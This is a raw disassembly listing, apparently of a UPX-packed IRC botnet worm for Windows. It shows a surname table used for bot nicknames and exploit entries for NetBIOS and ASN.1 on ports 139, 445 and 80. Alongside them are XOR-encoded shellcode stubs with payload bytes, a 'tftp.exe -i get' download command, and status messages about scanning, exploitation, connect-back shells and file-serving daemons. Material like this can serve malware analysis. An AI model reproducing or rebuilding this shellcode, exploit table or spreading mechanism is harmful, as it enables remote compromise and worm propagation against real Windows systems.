aCarmichael db 'Carmichael',0 ; DATA XREF: UPX0:0042DFE4�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: UPX0:0042DFE0�o
aCarlos db 'Carlos',0 ; DATA XREF: UPX0:0042DFDC�o
align 4
aCarlin db 'Carlin',0 ; DATA XREF: UPX0:0042DFD8�o
align 10h
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: UPX0:0042DFD4�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: UPX0:0042DFD0�o
aCapursi db 'Capursi',0 ; DATA XREF: UPX0:0042DFCC�o
aCappuccio db 'Cappuccio',0 ; DATA XREF: UPX0:0042DFC8�o
align 10h
aCapodilupo db 'Capodilupo',0 ; DATA XREF: UPX0:0042DFC4�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: UPX0:0042DFC0�o
align 4
aCaperton db 'Caperton',0 ; DATA XREF: UPX0:0042DFBC�o
align 4
aCapanni db 'Capanni',0 ; DATA XREF: UPX0:0042DFB8�o
aCanley db 'Canley',0 ; DATA XREF: UPX0:0042DFB4�o
align 4
aCammilleri db 'Cammilleri',0 ; DATA XREF: UPX0:0042DFB0�o
align 10h
aCammelli db 'Cammelli',0 ; DATA XREF: UPX0:0042DFAC�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: UPX0:0042DFA8�o
align 4
aCage db 'Cage',0 ; DATA XREF: UPX0:0042DFA4�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: UPX0:0042DFA0�o
align 4
aByerly db 'Byerly',0 ; DATA XREF: UPX0:0042DF9C�o
align 4
aByatt db 'Byatt',0 ; DATA XREF: UPX0:0042DF98�o
align 4
aBusetta db 'Busetta',0 ; DATA XREF: UPX0:0042DF94�o
aBurridge db 'Burridge',0 ; DATA XREF: UPX0:0042DF90�o
align 4
aBurke db 'Burke',0 ; DATA XREF: UPX0:0042DF8C�o
align 10h
aBurdzy db 'Burdzy',0 ; DATA XREF: UPX0:0042DF88�o
align 4
aBurden db 'Burden',0 ; DATA XREF: UPX0:0042DF84�o
align 10h
aBunton db 'Bunton',0 ; DATA XREF: UPX0:0042DF80�o
align 4
aBullard db 'Bullard',0 ; DATA XREF: UPX0:0042DF7C�o
aBudding db 'Budding',0 ; DATA XREF: UPX0:0042DF78�o
aBuchan db 'Buchan',0 ; DATA XREF: UPX0:0042DF74�o
align 10h
aBrzycki db 'Brzycki',0 ; DATA XREF: UPX0:0042DF70�o
aBrook db 'Brook',0 ; DATA XREF: UPX0:0042DF6C�o
align 10h
aBroca db 'Broca',0 ; DATA XREF: UPX0:0042DF68�o
align 4
aBritz db 'Britz',0 ; DATA XREF: UPX0:0042DF64�o
align 10h
aBrinton db 'Brinton',0 ; DATA XREF: UPX0:0042DF60�o
aBridges db 'Bridges',0 ; DATA XREF: UPX0:0042DF5C�o
aBridgeman db 'Bridgeman',0 ; DATA XREF: UPX0:0042DF58�o
align 4
aBrewer db 'Brewer',0 ; DATA XREF: UPX0:0042DF50�o
; UPX0:0042DF54�o
align 4
aBrennan db 'Brennan',0 ; DATA XREF: UPX0:0042DF4C�o
aBrenan db 'Brenan',0 ; DATA XREF: UPX0:0042DF48�o
align 4
aBreed db 'Breed',0 ; DATA XREF: UPX0:0042DF44�o
align 4
aBrecht db 'Brecht',0 ; DATA XREF: UPX0:0042DF40�o
align 4
aBradach db 'Bradach',0 ; DATA XREF: UPX0:0042DF3C�o
aBradac db 'Bradac',0 ; DATA XREF: UPX0:0042DF38�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: UPX0:0042DF34�o
align 10h
aBoyne db 'Boyne',0 ; DATA XREF: UPX0:0042DF30�o
align 4
aBoym db 'Boym',0 ; DATA XREF: UPX0:0042DF2C�o
align 10h
aBoyland db 'Boyland',0 ; DATA XREF: UPX0:0042DF28�o
aBoyes db 'Boyes',0 ; DATA XREF: UPX0:0042DF24�o
align 10h
aBoyajian db 'Boyajian',0 ; DATA XREF: UPX0:0042DF20�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: UPX0:0042DF1C�o
align 4
aBowers db 'Bowers',0 ; DATA XREF: UPX0:0042DF18�o
align 4
aBourneuf db 'Bourneuf',0 ; DATA XREF: UPX0:0042DF14�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: UPX0:0042DF10�o
aBoudin db 'Boudin',0 ; DATA XREF: UPX0:0042DF0C�o
align 4
aBotosh db 'Botosh',0 ; DATA XREF: UPX0:0042DF08�o
align 10h
aBothman db 'Bothman',0 ; DATA XREF: UPX0:0042DF04�o
aBossi db 'Bossi',0 ; DATA XREF: UPX0:0042DF00�o
align 10h
aBorden db 'Borden',0 ; DATA XREF: UPX0:0042DEFC�o
align 4
aBorack db 'Borack',0 ; DATA XREF: UPX0:0042DEF8�o
align 10h
aBoorstin db 'Boorstin',0 ; DATA XREF: UPX0:0042DEF4�o
align 4
aBoone db 'Boone',0 ; DATA XREF: UPX0:0042DEF0�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: UPX0:0042DEEC�o
align 10h
aBook db 'Book',0 ; DATA XREF: UPX0:0042DEE8�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: UPX0:0042DEE4�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: UPX0:0042DEE0�o
align 10h
aBonham db 'Bonham',0 ; DATA XREF: UPX0:0042DEDC�o
align 4
aBoner db 'Boner',0 ; DATA XREF: UPX0:0042DED8�o
align 10h
aBologna db 'Bologna',0 ; DATA XREF: UPX0:0042DED4�o
aBollinger db 'Bollinger',0 ; DATA XREF: UPX0:0042DED0�o
align 4
aBolick db 'Bolick',0 ; DATA XREF: UPX0:0042DECC�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: UPX0:0042DEC8�o
align 4
aBlyth db 'Blyth',0 ; DATA XREF: UPX0:0042DEC4�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: UPX0:0042DEC0�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: UPX0:0042DEBC�o
align 10h
aBloembergen db 'Bloembergen',0 ; DATA XREF: UPX0:0042DEB8�o
aBloch db 'Bloch',0 ; DATA XREF: UPX0:0042DEB4�o
align 4
aBlizard db 'Blizard',0 ; DATA XREF: UPX0:0042DEB0�o
aBliss db 'Bliss',0 ; DATA XREF: UPX0:0042DEAC�o
align 4
aBlanke db 'Blanke',0 ; DATA XREF: UPX0:0042DEA8�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: UPX0:0042DEA4�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: UPX0:0042DEA0�o
align 10h
aBlackwell db 'Blackwell',0 ; DATA XREF: UPX0:0042DE9C�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: UPX0:0042DE98�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: UPX0:0042DE94�o
align 10h
aBisema db 'Bisema',0 ; DATA XREF: UPX0:0042DE90�o
align 4
aBir db 'Bir',0 ; DATA XREF: UPX0:0042DE8C�o
aBinion db 'Binion',0 ; DATA XREF: UPX0:0042DE88�o
align 4
aBickel db 'Bickel',0 ; DATA XREF: UPX0:0042DE84�o
align 4
aBiagioli db 'Biagioli',0 ; DATA XREF: UPX0:0042DE80�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: UPX0:0042DE7C�o
aBetti db 'Betti',0 ; DATA XREF: UPX0:0042DE78�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: UPX0:0042DE74�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: UPX0:0042DE70�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: UPX0:0042DE6C�o
align 10h
aBernardo db 'Bernardo',0 ; DATA XREF: UPX0:0042DE68�o
align 4
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: UPX0:0042DE64�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: UPX0:0042DE60�o
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: UPX0:0042DE5C�o
align 4
aBelloc db 'Belloc',0 ; DATA XREF: UPX0:0042DE58�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: UPX0:0042DE54�o
aBellhouse db 'Bellhouse',0 ; DATA XREF: UPX0:0042DE50�o
align 10h
aBellavance db 'Bellavance',0 ; DATA XREF: UPX0:0042DE4C�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: UPX0:0042DE48�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: UPX0:0042DE44�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: UPX0:0042DE40�o
align 10h
aBelanger db 'Belanger',0 ; DATA XREF: UPX0:0042DE3C�o
align 4
aBehenna db 'Behenna',0 ; DATA XREF: UPX0:0042DE38�o
aBedford db 'Bedford',0 ; DATA XREF: UPX0:0042DE34�o
aBeder db 'Beder',0 ; DATA XREF: UPX0:0042DE30�o
align 4
aBeckman db 'Beckman',0 ; DATA XREF: UPX0:0042DE2C�o
aBean db 'Bean',0 ; DATA XREF: UPX0:0042DE28�o
align 4
aBeal db 'Beal',0 ; DATA XREF: UPX0:0042DE24�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: UPX0:0042DE20�o
align 4
aBayo db 'Bayo',0 ; DATA XREF: UPX0:0042DE1C�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: UPX0:0042DE18�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: UPX0:0042DE14�o
align 10h
aBatchelder db 'Batchelder',0 ; DATA XREF: UPX0:0042DE10�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: UPX0:0042DE0C�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: UPX0:0042DE08�o
align 4
aBartoo db 'Bartoo',0 ; DATA XREF: UPX0:0042DE04�o
align 4
aBartolome db 'Bartolome',0 ; DATA XREF: UPX0:0042DE00�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: UPX0:0042DDFC�o
aBarry db 'Barry',0 ; DATA XREF: UPX0:0042DDF8�o
align 4
aBarriola db 'Barriola',0 ; DATA XREF: UPX0:0042DDF4�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: UPX0:0042DDF0�o
aBarneson db 'Barneson',0 ; DATA XREF: UPX0:0042DDEC�o
align 4
aBarbetti db 'Barbetti',0 ; DATA XREF: UPX0:0042DDE8�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: UPX0:0042DDE4�o
aBaranowska db 'Baranowska',0 ; DATA XREF: UPX0:0042DDE0�o
align 4
aBaranczak db 'Baranczak',0 ; DATA XREF: UPX0:0042DDDC�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: UPX0:0042DDD8�o
aBarabesi db 'Barabesi',0 ; DATA XREF: UPX0:0042DDD4�o
align 4
aBanta db 'Banta',0 ; DATA XREF: UPX0:0042DDD0�o
align 4
aBaltz db 'Baltz',0 ; DATA XREF: UPX0:0042DDCC�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: UPX0:0042DDC8�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: UPX0:0042DDC4�o
align 10h
aBaleja db 'Baleja',0 ; DATA XREF: UPX0:0042DDC0�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: UPX0:0042DDBC�o
align 4
aBailar db 'Bailar',0 ; DATA XREF: UPX0:0042DDB8�o
align 4
aBagnold db 'Bagnold',0 ; DATA XREF: UPX0:0042DDB4�o
aBaglivo db 'Baglivo',0 ; DATA XREF: UPX0:0042DDB0�o
aBady db 'Bady',0 ; DATA XREF: UPX0:0042DDAC�o
align 4
aBackus db 'Backus',0 ; DATA XREF: UPX0:0042DDA8�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: UPX0:0042DDA4�o
align 4
aAzima db 'Azima',0 ; DATA XREF: UPX0:0042DDA0�o
align 10h
aAyling db 'Ayling',0 ; DATA XREF: UPX0:0042DD9C�o
align 4
aAykroyd db 'Aykroyd',0 ; DATA XREF: UPX0:0042DD98�o
aAyiemba db 'Ayiemba',0 ; DATA XREF: UPX0:0042DD94�o
aAxworthy db 'Axworthy',0 ; DATA XREF: UPX0:0042DD90�o
align 4
aAxelrod db 'Axelrod',0 ; DATA XREF: UPX0:0042DD8C�o
aAurelius db 'Aurelius',0 ; DATA XREF: UPX0:0042DD88�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: UPX0:0042DD84�o
align 4
aAtkins db 'Atkins',0 ; DATA XREF: UPX0:0042DD80�o
align 4
aArky db 'Arky',0 ; DATA XREF: UPX0:0042DD7C�o
align 4
aArjas db 'Arjas',0 ; DATA XREF: UPX0:0042DD78�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: UPX0:0042DD74�o
align 4
aArellano db 'Arellano',0 ; DATA XREF: UPX0:0042DD70�o
align 4
aArduini db 'Arduini',0 ; DATA XREF: UPX0:0042DD6C�o
aArbia db 'Arbia',0 ; DATA XREF: UPX0:0042DD68�o
align 4
aAntos db 'Antos',0 ; DATA XREF: UPX0:0042DD64�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: UPX0:0042DD60�o
aAnsley db 'Ansley',0 ; DATA XREF: UPX0:0042DD5C�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: UPX0:0042DD58�o
align 4
aAndron db 'Andron',0 ; DATA XREF: UPX0:0042DD54�o
align 10h
aAndrelus db 'Andrelus',0 ; DATA XREF: UPX0:0042DD50�o
align 4
aAndo db 'Ando',0 ; DATA XREF: UPX0:0042DD4C�o
align 4
aAndel db 'Andel',0 ; DATA XREF: UPX0:0042DD48�o
align 4
aAnand db 'Anand',0 ; DATA XREF: UPX0:0042DD44�o
align 4
aAmsden db 'Amsden',0 ; DATA XREF: UPX0:0042DD40�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: UPX0:0042DD3C�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: UPX0:0042DD38�o
align 10h
aAmaral db 'Amaral',0 ; DATA XREF: UPX0:0042DD34�o
align 4
aAltenhofen db 'Altenhofen',0 ; DATA XREF: UPX0:0042DD30�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: UPX0:0042DD2C�o
aAltavilla db 'Altavilla',0 ; DATA XREF: UPX0:0042DD28�o
align 4
aAlongi db 'Alongi',0 ; DATA XREF: UPX0:0042DD24�o
align 4
aAllison db 'Allison',0 ; DATA XREF: UPX0:0042DD20�o
aAleks db 'Aleks',0 ; DATA XREF: UPX0:0042DD1C�o
align 4
aAlda db 'Alda',0 ; DATA XREF: UPX0:0042DD18�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: UPX0:0042DD14�o
align 4
aAlavi db 'Alavi',0 ; DATA XREF: UPX0:0042DD10�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: UPX0:0042DD0C�o
align 4
aAdorno db 'Adorno',0 ; DATA XREF: UPX0:0042DD08�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: UPX0:0042DD04�o
align 4
aAdelstein db 'Adelstein',0 ; DATA XREF: UPX0:0042DD00�o
align 10h
aAddison db 'Addison',0 ; DATA XREF: UPX0:off_42DCFC�o
aAdams db 'Adams',0 ; DATA XREF: UPX0:0042DCF8�o
align 10h
aAckerman db 'Ackerman',0 ; DATA XREF: UPX0:0042DCF4�o
align 4
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: UPX0:off_42DCF0�o
align 4
byte_431948 db 50h ; DATA XREF: UPX0:0040ADF0�o
; UPX0:0040ADFD�r
db 43h, 2 dup(0)
dword_43194C dd 7C7325h ; DATA XREF: UPX0:0040AE9B�o
dword_431950 dd 5D73255Bh, 7Ch ; DATA XREF: UPX0:0040AFA5�o
dword_431958 dd 3F3F3Fh ; DATA XREF: UPX0:loc_40AF9C�o
; sub_41AA43:loc_41AB06�o
dword_43195C dd 334B32h ; DATA XREF: UPX0:0040AF95�o
dword_431960 dd 5058h ; DATA XREF: UPX0:0040AF87�o
; sub_41AA43+AA�o
dword_431964 dd 4B32h ; DATA XREF: UPX0:0040AF77�o
; sub_41AA43+98�o
dword_431968 dd 454Dh ; DATA XREF: UPX0:0040AF5E�o
; sub_41AA43+7E�o
dword_43196C dd 3839h ; DATA XREF: UPX0:0040AF4E�o
; sub_41AA43+6C�o
dword_431970 dd 544Eh ; DATA XREF: UPX0:0040AF3E�o
; sub_41AA43+5A�o
dword_431974 dd 3539h ; DATA XREF: UPX0:0040AF30�o
; sub_41AA43+46�o
dword_431978 dd 5D64255Bh, 7325h ; DATA XREF: sub_40AFEB+3A�o
dword_431980 dd 5D4D5Bh ; DATA XREF: sub_40AFEB+2C�o
; sub_40AFEB+57�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40AFEB+18�o
; sub_418212+5�o
align 4
jmp short loc_431990
; ---------------------------------------------------------------------------
loc_43198E: ; CODE XREF: UPX0:loc_431990�p
jmp short loc_431995
; ---------------------------------------------------------------------------
loc_431990: ; CODE XREF: UPX0:0043198C�j
call loc_43198E
loc_431995: ; CODE XREF: UPX0:loc_43198E�j
pop ebx
xor ecx, ecx
mov cx, 0FFFFh
loc_43199C: ; CODE XREF: UPX0:004319A1�j
xor byte ptr [ebx+0Eh], 0FFh
inc ebx
loop loc_43199C
add bl, ch
add ch, bl
add eax, 0FFFFF9E8h
call fword ptr [ebx+31h]
leave
mov cl, 0FFh
loc_4319B2: ; CODE XREF: UPX0:004319B7�j
xor byte ptr [ebx+0Ch], 0FFh
inc ebx
loop loc_4319B2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dd 12h
aTftp_exeIGet db 'tftp.exe -i get ',0
; ---------------------------------------------------------------------------
push 0
call sub_431A54
jnz short loc_431A40
retn
; ---------------------------------------------------------------------------
loc_431A40: ; CODE XREF: UPX0:00431A3D�j
; UPX0:00431A4D�j
call near ptr loc_431A45+1
loc_431A45: ; CODE XREF: UPX0:loc_431A40�p
add [edx+0], ch
call sub_431A54
jz loc_431A40
retn
; =============== S U B R O U T I N E =======================================
sub_431A54 proc near ; CODE XREF: UPX0:00431A38�p
; UPX0:00431A48�p
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
sub_431A54 endp
; ---------------------------------------------------------------------------
align 10h
dword_431A80 dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B1B4+10�o
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B385+51�o
align 4
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B385+35�o
align 8
aSym db 'sym',0 ; DATA XREF: sub_40C125+169�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40B7DB+30�o
align 4
dd 5 dup(0)
dword_431B00 dd 0B97h ; DATA XREF: sub_401ACD+1DA1�r
; sub_401ACD+1DCA�o ...
off_431B04 dd offset sub_40E0D1 ; DATA XREF: sub_40C125+1EA�r
dword_431B08 dd 0 ; DATA XREF: sub_40B64B+2E�o
; UPX0:0040D496�w ...
dword_431B0C dd 1 ; DATA XREF: sub_40BACE+1F�r
dword_431B10 dd 1 ; DATA XREF: sub_40BACE+3B3�r
dword_431B14 dd 0 ; DATA XREF: sub_40BACE+292�r
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch, 40E207h, 0
dd 2 dup(1), 0
aNet139 db 'net139',0
align 10h
dd 654E0000h, 69706174h, 393331h, 5 dup(0)
dd 8Bh, 40DF8Fh, 0
dd 2 dup(1), 0
aNet445 db 'net445',0
align 10h
dd 654E0000h, 69706174h, 353434h, 5 dup(0)
dd 1BDh, 40DF8Fh, 0
dd 2 dup(1), 0
aAsn80 db 'asn80',0
align 10h
dd 53410000h, 2D312E4Eh, 50545448h, 5 dup(0)
dd 50h, 40D2DAh, 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 10h
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40D2DAh, 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 10h
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh, 40D2DAh, 0
dd 2 dup(1), 2 dup(0)
dd 10100h, 0Eh dup(0)
aAsn445_0 db 'asn445',0
align 10h
db 2 dup(0)
byte_431CE2 db 1 ; DATA XREF: sub_401ACD:loc_4037E7�r
; sub_401ACD+1D24�o
db 73h
dd 6D79h, 0
dd 100h, 3 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_431D0E
; =============== S U B R O U T I N E =======================================
sub_431CFE proc near ; CODE XREF: sub_431CFE:loc_431D0E�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_431D06: ; CODE XREF: sub_431CFE+C�j
xor byte ptr [edx+ecx], 99h
loop loc_431D06
jmp short loc_431D13
; ---------------------------------------------------------------------------
loc_431D0E: ; CODE XREF: UPX0:00431CFC�j
call sub_431CFE
loc_431D13: ; CODE XREF: sub_431CFE+E�j
jo short near ptr dword_431C9C+12h
cwde
cdq
cdq
retn
sub_431CFE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B64B+86�o
align 10h
dword_431E90 dd 25370320h, 203A0373h, 2C6425h ; DATA XREF: sub_40B64B+46�o
unk_431E9C db 2Dh ; - ; DATA XREF: sub_40B64B+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
unk_431EBC db 2Dh ; - ; DATA XREF: sub_40B71A+38�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
unk_431F04 db 2Dh ; - ; DATA XREF: sub_40B786+22�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 10h
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40B7DB+7F�o
dword_431F40 dd 25370320h, 28200373h, 73253403h, 2C2903h ; DATA XREF: sub_40B7DB+40�o
dword_431F50 dd 234032Dh, 6E616373h, 202D0302h, 6C707845h, 2074696Fh
; DATA XREF: sub_40B7DB+14�o
dd 7473694Ch, 3Ah
unk_431F6C db 2Dh ; - ; DATA XREF: sub_40B8A2+172�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
unk_431FA0 db 2Dh ; - ; DATA XREF: sub_40B8A2+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 10h
unk_431FD0 db 2Dh ; - ; DATA XREF: sub_40BA57+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 10h
unk_431FF0 db 2Dh ; - ; DATA XREF: sub_40BA57+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
unk_43200C db 2Dh ; - ; DATA XREF: sub_40BACE+4B7�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start server, error: <%d>.',0
align 10h
unk_432040 db 2Dh ; - ; DATA XREF: sub_40BACE+38F�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_34 db '- Failed to start server, error: <%d>.',0
unk_432078 db 2Dh ; - ; DATA XREF: sub_40BACE+321�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_2 db '- Server started on Port: %d.',0
align 4
unk_4320A8 db 2Dh ; - ; DATA XREF: sub_40BACE+26C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_35 db 'Failed to start server, error: <%d>.',0
align 4
unk_4320DC db 2Dh ; - ; DATA XREF: sub_40BACE+1FE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 10h
unk_432110 db 2Dh ; - ; DATA XREF: sub_40BACE+148�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_36 db ' Failed to start server, error: <%d>.',0
align 4
unk_432144 db 2Dh ; - ; DATA XREF: sub_40C125+EE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
unk_43216C db 2Dh ; - ; DATA XREF: sub_40C125+93�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_4321A4 db 2Dh ; - ; DATA XREF: sub_40C33D+1CE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_4321E4 db 2Dh ; - ; DATA XREF: sub_40C33D+173�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_43221C db 2Dh ; - ; DATA XREF: sub_40C33D+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_432250 db 2Dh ; - ; DATA XREF: sub_40C33D+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
unk_432284 db 2Dh ; - ; DATA XREF: sub_40C59C+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 4
